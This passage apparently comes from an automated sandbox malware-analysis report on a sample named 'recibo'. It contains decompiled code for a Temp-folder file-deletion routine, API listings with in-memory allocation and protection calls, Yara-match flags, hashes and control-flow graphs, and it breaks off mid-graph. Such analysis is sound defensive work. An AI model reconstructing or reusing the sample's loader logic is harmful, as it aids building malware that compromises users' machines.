							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040653D(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405C01(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E0040559F(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x434f88 =  *0x434f88 + 1;
										} else {
											E0040559F(0xfffffff1, _t68);
											E004062FD(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C49(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x42f270 - 0x5c;
					if( *0x42f270 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406873(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405E0C(_t68);
							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E0040559F(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E0040559F(0xfffffff1, _t68);
							return E004062FD(_t67, _t68, 0);
						}
						L30:
						 *0x434f88 =  *0x434f88 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                                  0x00405c53
                                                                                  0x00405c58
                                                                                  0x00405c61
                                                                                  0x00405c64
                                                                                  0x00405c6c
                                                                                  0x00405c6f
                                                                                  0x00405c72
                                                                                  0x00405c7a
                                                                                  0x00405c7c
                                                                                  0x00405c7d
                                                                                  0x00000000
                                                                                  0x00405c7d
                                                                                  0x00405c88
                                                                                  0x00405c8b
                                                                                  0x00405c8b
                                                                                  0x00405c8b
                                                                                  0x00405c8f
                                                                                  0x00405ca2
                                                                                  0x00405ca9
                                                                                  0x00405cae
                                                                                  0x00405cb2
                                                                                  0x00405cc2
                                                                                  0x00405cb4
                                                                                  0x00405cba
                                                                                  0x00405cba
                                                                                  0x00405cc7
                                                                                  0x00405ccb
                                                                                  0x00405cd7
                                                                                  0x00405cdd
                                                                                  0x00405ce2
                                                                                  0x00405ce8
                                                                                  0x00405cf3
                                                                                  0x00405cf9
                                                                                  0x00405cfb
                                                                                  0x00405cfe
                                                                                  0x00405da8
                                                                                  0x00405da8
                                                                                  0x00405dac
                                                                                  0x00405dae
                                                                                  0x00405dae
                                                                                  0x00405dae
                                                                                  0x00405dae
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405d04
                                                                                  0x00405d04
                                                                                  0x00405d04
                                                                                  0x00405d0c
                                                                                  0x00405d2c
                                                                                  0x00405d34
                                                                                  0x00405d39
                                                                                  0x00405d40
                                                                                  0x00405d5b
                                                                                  0x00405d60
                                                                                  0x00405d62
                                                                                  0x00405d86
                                                                                  0x00405d64
                                                                                  0x00405d64
                                                                                  0x00405d67
                                                                                  0x00405d7b
                                                                                  0x00405d69
                                                                                  0x00405d6c
                                                                                  0x00405d74
                                                                                  0x00405d74
                                                                                  0x00405d67
                                                                                  0x00405d42
                                                                                  0x00405d48
                                                                                  0x00405d4a
                                                                                  0x00405d50
                                                                                  0x00405d50
                                                                                  0x00405d4a
                                                                                  0x00000000
                                                                                  0x00405d40
                                                                                  0x00405d0e
                                                                                  0x00405d16
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405d18
                                                                                  0x00405d20
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405d22
                                                                                  0x00405d2a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405d8b
                                                                                  0x00405d93
                                                                                  0x00405d99
                                                                                  0x00405d99
                                                                                  0x00405da2
                                                                                  0x00000000
                                                                                  0x00405da2
                                                                                  0x00405ccd
                                                                                  0x00405cd5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405c91
                                                                                  0x00405c91
                                                                                  0x00405c93
                                                                                  0x00405db3
                                                                                  0x00405db5
                                                                                  0x00405db8
                                                                                  0x00405e09
                                                                                  0x00405e09
                                                                                  0x00405e09
                                                                                  0x00405dba
                                                                                  0x00405dbd
                                                                                  0x00405dc8
                                                                                  0x00405dcd
                                                                                  0x00405dcf
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405dd2
                                                                                  0x00405dde
                                                                                  0x00405de3
                                                                                  0x00405de5
                                                                                  0x00000000
                                                                                  0x00405e00
                                                                                  0x00405de7
                                                                                  0x00405dea
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405def
                                                                                  0x00000000
                                                                                  0x00405df6
                                                                                  0x00405dbf
                                                                                  0x00405dbf
                                                                                  0x00000000
                                                                                  0x00405dbf
                                                                                  0x00405c99
                                                                                  0x00405c9c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405c9c

                                                                                  APIs
                                                                                  • DeleteFileW.KERNELBASE(?,?,77343420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                                  • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,77343420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                                  • FindFirstFileW.KERNELBASE(0042F270,?,?,?,0040A014,?,0042F270,?,?,77343420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                                  • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                  • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                  • API String ID: 2035342205-1953461807
                                                                                  • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                  • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                                  • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                  • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB4E18 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 469COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 923 2cb4e18-2cb4e23 924 2cb4e7a-2cb4e84 923->924 925 2cb4e25-2cb4e2f 923->925 926 2cb4e86-2cb4e8a 924->926 925->926 927 2cb4e31-2cb4e3b 925->927 930 2cb4e9f-2cb4ea1 926->930 931 2cb4e8c-2cb4e90 926->931 928 2cb4e3d-2cb4e42 927->928 929 2cb4e92-2cb4e9e 927->929 932 2cb4e44-2cb4e47 928->932 929->930 934 2cb4ea2-2cb4ea3 930->934 931->929 933 2cb4ea9-2cb4ebd call 2cc34f4 931->933 935 2cb4e6a-2cb4e78 932->935 936 2cb4e49 932->936 943 2cb4f3b 933->943 944 2cb4ebf-2cb4ecc 933->944 937 2cb4ea4-2cb4ea7 934->937 935->924 941 2cb54cb-2cb54ce 935->941 939 2cb4e4b-2cb4e5f 936->939 940 2cb4df7-2cb4e12 936->940 937->933 939->934 945 2cb4e61-2cb4e68 939->945 940->932 946 2cb552d-2cb5537 941->946 947 2cb54d0-2cb54d3 941->947 950 2cb4f3d 943->950 951 2cb4f92-2cb4f93 943->951 944->937 955 2cb4ece-2cb4f01 944->955 945->935 952 2cb5539 946->952 953 2cb558e-2cb55ac 946->953 948 2cb54d8-2cb54ef 947->948 948->948 954 2cb54f1-2cb54f6 call 2cc34f4 948->954 956 2cb4f3f-2cb4f64 950->956 959 2cb4f97-2cb4fa0 951->959 960 2cb4f95 951->960 957 2cb553c-2cb5546 952->957 958 2cb55ad-2cb55b3 953->958 954->957 955->956 962 2cb4f6a-2cb4f91 call 2cbb85a 956->962 963 2cb3883-2cb3899 call 2cb3685 956->963 957->953 964 2cb55b7-2cb55df 958->964 965 2cc34f4-2cc35b7 959->965 966 2cb4fa6-2cb51c9 call 2cc67e4 959->966 960->959 962->951 980 2cb389b-2cb38a3 963->980 981 2cb3833-2cb3851 963->981 964->964 971 2cb55e1-2cb55f6 964->971 975 2cc35b9-2cc3615 call 2cc3d6a call 2cc3654 965->975 976 2cc3617-2cc362f LoadLibraryA call 2cc3654 965->976 966->941 1008 2cb51cf-2cb525b 966->1008 971->958 978 2cb55f8-2cb5609 971->978 975->976 985 2cb563c-2cb5642 978->985 986 2cb560c-2cb5613 978->986 988 2cb38f9-2cb391b 980->988 989 2cb38a5-2cb38d3 980->989 992 2cb381c-2cb382d 981->992 993 2cb3853-2cb3869 981->993 995 2cb5645-2cb564a 985->995 986->995 1005 2cb391d-2cb3923 988->1005 1006 2cb3972 988->1006 992->981 995->965 1013 2cb397a-2cb3990 1005->1013 1014 2cb3925-2cb3970 1005->1014 1010 2cb39d0-2cb39d3 1006->1010 1011 2cb3974-2cb3977 1006->1011 1017 2cb525d-2cb528c 1008->1017 1015 2cb39d4-2cb39e9 1010->1015 1018 2cb3991-2cb39a6 1013->1018 1014->1006 1015->1015 1019 2cb39eb-2cb39f6 1015->1019 1017->965 1025 2cb5292-2cb5313 call 2cc37f4 call 2cb52e7 1017->1025 1021 2cb39a8 1018->1021 1022 2cb39b2-2cb39c3 1018->1022 1019->1013 1023 2cb39f8-2cb39fe 1019->1023 1021->1022 1022->1018 1026 2cb39c5-2cb39cc 1022->1026 1024 2cb3a44-2cb3a69 1023->1024 1027 2cb3a0d-2cb3a17 1024->1027 1028 2cb3a6c-2cb3a6d 1024->1028 1053 2cb536a-2cb5375 1025->1053 1054 2cb5315-2cb531f 1025->1054 1026->1010 1030 2cb3a19-2cb3a23 1027->1030 1031 2cb3a6e-2cb3a78 1027->1031 1028->1031 1033 2cb3a7a-2cb3a84 1030->1033 1034 2cb3a25-2cb3a2f 1030->1034 1031->1033 1037 2cb3a86-2cb3a89 1033->1037 1038 2cb3a33 1033->1038 1036 2cb3a31 1034->1036 1034->1037 1036->1038 1041 2cb3a8a-2cb3a91 1037->1041 1038->1041 1042 2cb3a35-2cb3a3b 1038->1042 1045 2cb3a92-2cb3a94 1041->1045 1044 2cb3a3d-2cb3a3f 1042->1044 1042->1045 1047 2cb3a41-2cb3a42 1044->1047 1048 2cb3a96-2cb3a97 1044->1048 1049 2cb3a9b-2cb3aa4 1045->1049 1050 2cb3a95 1045->1050 1047->1024 1051 2cb3a98-2cb3a9a 1048->1051 1052 2cb3aa7-2cc70d5 1048->1052 1049->1052 1050->1048 1050->1049 1051->1049 1064 2cc70d6-2cc70ef 1052->1064 1056 2cb5398-2cb539f 1053->1056 1057 2cb5377-2cb537c 1053->1057 1058 2cb5321-2cb5323 1054->1058 1059 2cb5376-2cb5377 1054->1059 1061 2cc4e81-2cc4e83 call 2cc4e88 1056->1061 1063 2cb53a5-2cb53aa 1056->1063 1060 2cb5382-2cb5387 1057->1060 1057->1061 1062 2cb537a-2cb537c 1058->1062 1066 2cb5325-2cb532b 1058->1066 1059->1062 1060->1061 1068 2cb538d-2cb5392 1060->1068 1072 2cc4e83 call 2cc4e88 1061->1072 1062->1060 1062->1061 1063->1061 1069 2cb53b0-2cb53b5 1063->1069 1064->963 1070 2cc70f5-2cc7112 1064->1070 1066->1060 1071 2cb532d-2cb534f 1066->1071 1068->1056 1068->1061 1069->1061 1073 2cb53bb-2cb53c0 1069->1073 1070->1064 1074 2cc7114-2cc7116 1070->1074 1071->963 1080 2cb5355-2cb5360 1071->1080 1073->1061 1077 2cb53c6-2cb5441 1073->1077 1077->1017 1081 2cb5447-2cb5498 1077->1081 1080->1053
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (O$n$vq$x`#
                                                                                  • API String ID: 0-2414866765
                                                                                  • Opcode ID: 364243280596b6ee458ea9728067a476028482996d9f9e6dd7d6044235323a9e
                                                                                  • Instruction ID: 670f4795af3904f7b3072d5b61e3f29c25ca48f01b1bc437a59dd1fe9360339d
                                                                                  • Opcode Fuzzy Hash: 364243280596b6ee458ea9728067a476028482996d9f9e6dd7d6044235323a9e
                                                                                  • Instruction Fuzzy Hash: 2BE1C275A083858FDB369E38CC657DB77A2EF86390F59411ECC898F205D3318A46CB52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB876B Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 418COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: dFu\$O
                                                                                  • API String ID: 0-335019749
                                                                                  • Opcode ID: 6d65a41d2fbcb8f7db7cfc83fed42c161fcda9a0b8141ef0e4e47e579f24c240
                                                                                  • Instruction ID: ade4e1c78e48485e3431f50b4cef910647dae9d8103cb7b3ae9e69fb76f06ab8
                                                                                  • Opcode Fuzzy Hash: 6d65a41d2fbcb8f7db7cfc83fed42c161fcda9a0b8141ef0e4e47e579f24c240
                                                                                  • Instruction Fuzzy Hash: 49E19A7560434A9FDF319E388D503DB37A7AF963A0FA5461EDC89DB245D3318A868B02
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB71CF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 298libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?,C9BF8E65,?,02CB291E), ref: 02CC361E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: &0Vs$vq
                                                                                  • API String ID: 1029625771-2351862953
                                                                                  • Opcode ID: 636e6442bf8911caf6dbb6b5e0b7f3a7a523b02eb722f209d1992edcdd86d233
                                                                                  • Instruction ID: 5fdf3398ffb52cc86d045447a9a4baaef9138191e8e206e410fa34fc89369966
                                                                                  • Opcode Fuzzy Hash: 636e6442bf8911caf6dbb6b5e0b7f3a7a523b02eb722f209d1992edcdd86d233
                                                                                  • Instruction Fuzzy Hash: 89A1AC729043559FCF329E29CC547DA7BA2EF5A350F65411EDCC99B300D7324989CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CC42E9 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 283memorynativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 02CC34F4: LoadLibraryA.KERNELBASE(?,C9BF8E65,?,02CB291E), ref: 02CC361E
                                                                                  • NtAllocateVirtualMemory.NTDLL ref: 02CC4519
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                  • String ID: zUf
                                                                                  • API String ID: 2616484454-1590610335
                                                                                  • Opcode ID: f89817a2134b5fffb818efa1475f54a25c383d411f8e34121f73e06a8a92b41e
                                                                                  • Instruction ID: 7b4b9a313d6eef882eed3e0592d3e3136515f57ff281ba6a9fb3ce00c09ad9fc
                                                                                  • Opcode Fuzzy Hash: f89817a2134b5fffb818efa1475f54a25c383d411f8e34121f73e06a8a92b41e
                                                                                  • Instruction Fuzzy Hash: 91918D75A043498FDF399E24C8717EE3BA2EF5A350F69852DDC898B214D731CA85CB42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CC61B4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtProtectVirtualMemory.NTDLL(-BCF9EB3C,?,?,?,?,02CC53C4,03C46E6A,B1A257AB,?,-1B0DC8A7), ref: 02CC6272
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MemoryProtectVirtual
                                                                                  • String ID: s:i&
                                                                                  • API String ID: 2706961497-385934651
                                                                                  • Opcode ID: 384cd5ffcdba308440187aa2f330d06ee0877c2d39bc515448a3159d21d4967e
                                                                                  • Instruction ID: 2a7451321cc750af4978b83d7089d41b549d89c9ecf0af677e72b84f376ade80
                                                                                  • Opcode Fuzzy Hash: 384cd5ffcdba308440187aa2f330d06ee0877c2d39bc515448a3159d21d4967e
                                                                                  • Instruction Fuzzy Hash: 04014471B002945FEB24CE59CDD46DEB7AAEF99700F85802EDC4967304C630AE09CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00406873 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00406873(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4302b8;
			}




                                                                                  0x0040687e
                                                                                  0x00406887
                                                                                  0x00000000
                                                                                  0x00406894
                                                                                  0x0040688a
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 44w,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77343420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040688A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFileFirst
                                                                                  • String ID:
                                                                                  • API String ID: 2295610775-0
                                                                                  • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                  • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                                  • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                  • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CC3D6A Relevance: 1.6, APIs: 1, Instructions: 131libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?,C9BF8E65,?,02CB291E), ref: 02CC361E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: d8894260c7abf72f78e67b47b5bb06edf56f4ba62d92c8c342255964ba9d88fc
                                                                                  • Instruction ID: 18d2d883cce1011e41cb667547c22e39b54550476d23af5ef2eac14d41f39e46
                                                                                  • Opcode Fuzzy Hash: d8894260c7abf72f78e67b47b5bb06edf56f4ba62d92c8c342255964ba9d88fc
                                                                                  • Instruction Fuzzy Hash: 12410670A00399DFCB39DE249D587DA77A2AF66360FA480AEEC498F201D7309B45DB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CC2B9D Relevance: 1.6, APIs: 1, Instructions: 68fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE(?,0981125B), ref: 02CC2D13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 19e005512356690749cbdb71695c36a9ae9b3f87fffc99e71f36484d04bad449
                                                                                  • Instruction ID: 81f5d69bab2f4419b1c16f80771570733749f67ede48786198c639068f0fccfa
                                                                                  • Opcode Fuzzy Hash: 19e005512356690749cbdb71695c36a9ae9b3f87fffc99e71f36484d04bad449
                                                                                  • Instruction Fuzzy Hash: A321AF756083459BDB24AE39C9A63EFB7A2BF52390F96492DDDC2864A1D3318185CF03
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CC67E9 Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtMapViewOfSection.NTDLL(00000001,02CC6EA6), ref: 02CC6A45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: SectionView
                                                                                  • String ID:
                                                                                  • API String ID: 1323581903-0
                                                                                  • Opcode ID: a669d4af5395dad1a714df4aa92651a8b233b25536b77fce8decb1e16edb34d3
                                                                                  • Instruction ID: 9648d973b33665db56a3e07e843dd8a958d1565af59f04519ce39a9eb70eeee3
                                                                                  • Opcode Fuzzy Hash: a669d4af5395dad1a714df4aa92651a8b233b25536b77fce8decb1e16edb34d3
                                                                                  • Instruction Fuzzy Hash: 8D019230688346CBCB289D758B643EA37A5EFD9394F35813CCD878B604E7349585CB01
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 194 403f9a-403fac 195 403fb2-403fb8 194->195 196 404113-404122 194->196 195->196 197 403fbe-403fc7 195->197 198 404171-404186 196->198 199 404124-40416c GetDlgItem * 2 call 404499 SetClassLongW call 40140b 196->199 202 403fc9-403fd6 SetWindowPos 197->202 203 403fdc-403fe3 197->203 200 4041c6-4041cb call 4044e5 198->200 201 404188-40418b 198->201 199->198 213 4041d0-4041eb 200->213 205 40418d-404198 call 401389 201->205 206 4041be-4041c0 201->206 202->203 208 403fe5-403fff ShowWindow 203->208 209 404027-40402d 203->209 205->206 230 40419a-4041b9 SendMessageW 205->230 206->200 212 404466 206->212 214 404100-40410e call 404500 208->214 215 404005-404018 GetWindowLongW 208->215 216 404046-404049 209->216 217 40402f-404041 DestroyWindow 209->217 224 404468-40446f 212->224 221 4041f4-4041fa 213->221 222 4041ed-4041ef call 40140b 213->222 214->224 215->214 223 40401e-404021 ShowWindow 215->223 227 40404b-404057 SetWindowLongW 216->227 228 40405c-404062 216->228 225 404443-404449 217->225 234 404200-40420b 221->234 235 404424-40443d DestroyWindow EndDialog 221->235 222->221 223->209 225->212 233 40444b-404451 225->233 227->224 228->214 229 404068-404077 GetDlgItem 228->229 236 404096-404099 229->236 237 404079-404090 SendMessageW IsWindowEnabled 229->237 230->224 233->212 238 404453-40445c ShowWindow 233->238 234->235 239 404211-40425e call 40657a call 404499 * 3 GetDlgItem 234->239 235->225 240 40409b-40409c 236->240 241 40409e-4040a1 236->241 237->212 237->236 238->212 266 404260-404265 239->266 267 404268-4042a4 ShowWindow KiUserCallbackDispatcher call 4044bb EnableWindow 239->267 243 4040cc-4040d1 call 404472 240->243 244 4040a3-4040a9 241->244 245 4040af-4040b4 241->245 243->214 248 4040ea-4040fa SendMessageW 244->248 249 4040ab-4040ad 244->249 245->248 250 4040b6-4040bc 245->250 248->214 249->243 254 4040d3-4040dc call 40140b 250->254 255 4040be-4040c4 call 40140b 250->255 254->214 263 4040de-4040e8 254->263 264 4040ca 255->264 263->264 264->243 266->267 270 4042a6-4042a7 267->270 271 4042a9 267->271 272 4042ab-4042d9 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042db-4042ec SendMessageW 272->273 274 4042ee 272->274 275 4042f4-404333 call 4044ce call 403f7b call 40653d lstrlenW call 40657a SetWindowTextW call 401389 273->275 274->275 275->213 286 404339-40433b 275->286 286->213 287 404341-404345 286->287 288 404364-404378 DestroyWindow 287->288 289 404347-40434d 287->289 288->225 290 40437e-4043ab CreateDialogParamW 288->290 289->212 291 404353-404359 289->291 290->225 292 4043b1-404408 call 404499 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 290->292 291->213 293 40435f 291->293 292->212 298 